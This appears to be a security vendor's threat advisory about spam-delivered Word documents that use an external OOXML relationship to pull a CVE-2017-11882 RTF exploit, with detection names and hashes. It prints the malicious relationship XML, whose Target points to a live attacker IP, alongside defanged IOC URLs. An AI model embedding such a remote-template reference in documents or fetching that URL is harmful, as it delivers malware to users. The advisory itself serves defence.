Distribution of RTF Vulnerability Malware that Takes Advantage of Microsoft Office Word’s External Connection

Distribution of RTF vulnerability (CVE-2017-11882) malware that uses external connection of MS Office Word document has been found. Employees must be on the lookout as the attacker is using spam e-mails to distribute malware to domestic shopping malls and other businesses.

Recently, the distribution of MS Office Word malware using external connection has been increasing exponentially. As the attacker uses normal XML Relationship of OOXML (Office Open XML) format and uses malicious URL for only the target address, it is difficult to figure out whether the file is malicious with the file binary alone. The following is a malicious URL that has been inserted into the document file. When the document file is open, it automatically attempts to connect to the malicious URL.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" 
Target="http://23.95.122.25/..-.-................-.....-------------/........................................................................dot" TargetMode="External"/></Relationships>

Once connected, RTF vulnerability file binary is loaded to the currently opened document file. The vulnerability is CVE-2017-11882 which was used in the past. When looked up in VirusTotal, the result shows that various anti-malware product including AhnLab V3 are already detecting it.

Even if the MS Office Word document file is not detected as a malicious file, V3 product can detect and block it in real-time and prevent any damage as long as the RTF binary has been loaded during the execution phase.

Along with blocking the execution phase in real-time, AhnLab is detecting the related files using the aliases below.

[File Detection]
Downloader/XML.External
Downloader/DOC.External
Downloader/XML.External.S1461
RTF/Malform-A.Gen

[IOC]
3fdc2e4e52b6499def0ff7411a7e0060
506e20689941bee2677c7214bc2083f2
e70135cdb555ce99adee7df642813dcb
hxxp://23.95.122.25/..-.-…………….-…..————-/…………………………………………………….dot
hxxp://23.95.122.25/..-.-…………….-…..————-/………………………………………………………………dot

0 0 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments